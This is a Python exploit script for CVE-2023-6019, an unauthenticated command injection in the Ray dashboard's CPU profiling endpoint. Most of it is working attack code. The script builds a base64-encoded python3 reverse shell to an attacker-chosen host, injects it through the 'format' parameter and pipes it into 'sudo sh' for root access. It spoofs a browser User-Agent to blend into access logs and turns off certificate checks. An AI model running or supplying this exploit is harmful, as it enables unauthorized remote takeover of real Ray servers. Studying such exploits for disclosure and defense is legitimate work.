
Ray OS v2.6.3 - Command Injection RCE (Unauthorized) - CVE-2023-6019

# Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized)
# Description:
#  The Ray dashboard's CPU profiling endpoint (/worker/cpu_profile) inserts the
#  `format` query parameter into a command line that is executed by a shell
#  without validating it, so a single request that needs no authentication can
#  run arbitrary commands as the dashboard user. If that user has passwordless
#  sudo (a setup some Ray configurations require) the payload below yields a
#  root shell. Note that the payload pipes the decoded script into `sudo sh`:
#  where passwordless sudo is NOT configured, sudo will usually fail for want of
#  a tty to prompt on and nothing executes the script, so a user-level shell
#  requires changing the sink to plain `sh` rather than appearing automatically.
# Version: <= 2.6.3
# Date: 2024-4-10
# Exploit Author: Fire_Wolf
# Tested on: Ubuntu 20.04.6 LTS
# Vendor Homepage: https://www.ray.io/
# Software Link: https://github.com/ray-project/ray
# CVE: CVE-2023-6019
# Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe
# ==========================================================================================
  17.  
#!/usr/bin/env python3
# coding=utf-8
# NOTE: a shebang only takes effect on the very first line of a file; placed
# here, after the header comment, it is purely informational.
import argparse
import base64
import urllib.parse

import requests
import urllib3
  24.  
# Optional intercepting proxy (e.g. Burp on localhost:8080). It is defined for
# convenience only: none of the requests.get calls in this file pass it, so to
# route traffic through it add `proxies=proxies` to the call.
proxies = dict(http="127.0.0.1:8080")

# Browser-like User-Agent sent with every request so the probe and the exploit
# request do not stand out as python-requests in the dashboard's access log.
headers = dict(
    [
        (
            "User-Agent",
            "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0",
        ),
    ]
)
  29.  
  30.  
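def check_url(target, port):
    """Return the dashboard base URL ``scheme://host:port`` for ``target``.

    Args:
        target: host, IP, or a full ``http(s)://host`` prefix. A scheme
            supplied by the caller is kept as-is (the original code prepended
            a second ``http://`` in that case). A trailing ``/`` is dropped so
            the port can be appended; pass the port via ``port``, not in
            ``target``.
        port: dashboard port as int or str (argparse hands over an int when
            its default is used, which the original ``+`` concatenation
            rejected).

    Returns:
        Always a string. When ``target`` carries no scheme, a short plain-HTTP
        probe is sent first; if it cannot connect, HTTPS is tried; if neither
        answers, the plain-HTTP URL is returned with a warning so the caller
        can still proceed (the original returned the int ``0`` on a non-200
        probe, which then crashed ``exp``). Any HTTP status counts as
        "reachable": the dashboard root need not answer 200 for the profiling
        endpoint to exist.
    """
    host_port = target.rstrip("/") + ":" + str(port)
    if target.startswith(("http://", "https://")):
        return host_port

    # Internal dashboards commonly sit behind self-signed certificates and we
    # only need to learn which scheme answers, so certificate validation is
    # deliberately skipped for the probe (and its warning silenced).
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    for scheme in ("http://", "https://"):
        probe_url = scheme + host_port
        try:
            requests.get(url=probe_url, headers=headers, verify=False, timeout=3)
        except requests.exceptions.RequestException as e:
            print("ERROR! The Exception is:" + format(e))
            continue
        return probe_url

    print("[-]No answer over http or https, falling back to http://")
    return "http://" + host_port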
  48.  
  49.  
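def exp(target, ip, lhost, lport, pid=3354, sudo=True, timeout=15):
    """Send the CVE-2023-6019 command injection and report the outcome.

    The injected command lives in the ``format`` query parameter of
    ``/worker/cpu_profile``: a backtick substitution decodes a base64 blob and
    pipes it into a shell, and the blob is a python3 one-liner that opens a
    reverse shell to ``lhost:lport``.

    Args:
        target: base URL of the dashboard, e.g. ``http://10.0.0.5:8265``
            (as returned by ``check_url``).
        ip: value for the ``ip`` query parameter (node IP of the worker).
        lhost: IP/hostname the reverse shell connects back to.
        lport: port the reverse shell connects back to; int or str (the
            original only accepted a str and crashed on argparse's int default).
        pid: value for the ``pid`` query parameter; the original hard-coded
            3354. Whether the endpoint needs a real worker pid before the
            injected ``format`` is reached is not verified here -- TODO confirm.
        sudo: when True (default) the decoded script is piped into ``sudo sh``
            exactly as in the original payload. Set False to pipe into plain
            ``sh`` on hosts without passwordless sudo, where ``sudo`` would
            otherwise fail (no tty to prompt on) and nothing would run the script.
        timeout: seconds to wait for the HTTP response. The reverse shell runs
            inside the command substitution, so on success the handler stays
            busy and the request is expected to time out; the original had no
            timeout and hung forever in that case.

    Returns:
        The exploit URL that was requested, for replaying it manually.
    """
    lport = str(lport)
    shell_sink = "sudo%20sh" if sudo else "sh"

    payload = (
        "python3 -c 'import socket,subprocess,os;"
        "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
        f's.connect(("{lhost}",{lport}));'
        "os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
        "import pty; pty.spawn(\"/bin/bash\")'"
    )
    print("[*]Payload is: " + payload)
    b64_payload = base64.b64encode(payload.encode()).decode()
    print("[*]Base64 encoding payload is: " + b64_payload)

    # Standard base64 may contain '+', '/' and '='. A bare '+' in a query
    # string is decoded as a space by form-style parsers (parse_qsl), which
    # would corrupt the blob before `base64 -d` sees it, so percent-encode the
    # blob. requests leaves these escapes alone and the server decodes them.
    # Spaces at shell level stay as $IFS / %20, as in the original payload.
    encoded_blob = urllib.parse.quote(b64_payload, safe="")
    exp_url = (
        target
        + "/worker/cpu_profile?pid=" + str(pid)
        + "&ip=" + str(ip)
        + "&duration=5&native=0&format=`echo " + encoded_blob
        + " |base64$IFS-d|" + shell_sink + "`"
    )
    print(exp_url)

    # Self-signed certs are common on internal dashboards; skip validation.
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    try:
        response = requests.get(url=exp_url, headers=headers, verify=False, timeout=timeout)
    except requests.exceptions.Timeout:
        print("[+]No response within %ss - the injected command is probably holding "
              "the request open; check your listener!" % timeout)
        return exp_url
    except requests.exceptions.RequestException as e:
        print("[-]ERROR: request failed: " + format(e))
        return exp_url

    # Original heuristic: a clean 200 means the profiler ran normally and the
    # injection did not fire; anything else is taken as the command having run.
    if response.status_code == 200:
        print("[-]ERROR: Exploit Failed,please check the payload.")
    else:
        print("[+]Exploit is finished,please check your machine!")
    return exp_url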
  64.  
  65.  
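if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description='''
        ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀
       ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
       ⡠⠄⡄⡄⡠⡀⣀⡀⢒⠄⡔⡄⢒⠄⢒⠄⣀⡀⣖⡂⡔⡄⢴⠄⣖⡆⠄⠄⡤⡀⡄⡄
       ⠑⠂⠘⠄⠙⠂⠄⠄⠓⠂⠑⠁⠓⠂⠒⠁⠄⠄⠓⠃⠑⠁⠚⠂⠒⠃⠐⠄⠗⠁⠬⠃
       
       
       
                           ⢰⣱⢠⢠⠠⡦⢸⢄⢀⢄⢠⡠⠄⠄⢸⠍⠠⡅⢠⡠⢀⢄⠄⠄⢸⣸⢀⢄⠈⡇⠠⡯⠄
                           ⠘⠘⠈⠚⠄⠓⠘⠘⠈⠊⠘⠄⠄⠁⠘⠄⠐⠓⠘⠄⠈⠓⠠⠤⠘⠙⠈⠊⠐⠓⠄⠃⠄
       ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀
       ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
       ''',
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    # Defaults are strings on purpose: argparse applies `type` only to string
    # defaults, so `default=80` (int) reached check_url()/exp(), which
    # concatenate the value with `+` and raised TypeError.
    parser.add_argument('-t', '--target', type=str, required=True, help='target ip')
    parser.add_argument('-p', '--port', type=str, default='80', required=False, help='target host port')
    parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip')
    parser.add_argument('-P', '--lport', type=str, default='80', required=False, help='listening port')
    args = parser.parse_args()

    # The `ip` query parameter wants a bare host/IP. The original forwarded -t
    # verbatim, so a scheme, path or :port typed into -t went into the URL too;
    # strip them here (a single ':' is treated as host:port, more than one is
    # left alone so bracket-less IPv6 is not mangled).
    ip = args.target.split('://', 1)[-1].split('/', 1)[0]
    if ip.count(':') == 1:
        ip = ip.rsplit(':', 1)[0]

    targeturl = check_url(args.target, args.port)
    if not isinstance(targeturl, str):
        # check_url signals an unreachable target with a non-string value;
        # bail out instead of letting exp() fail on string concatenation.
        print("[-]Target did not answer the reachability probe: " + str(args.target))
        raise SystemExit(1)
    print("[*] Checking in url: " + targeturl)
    exp(targeturl, ip, args.lhost, args.lport)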
  97.            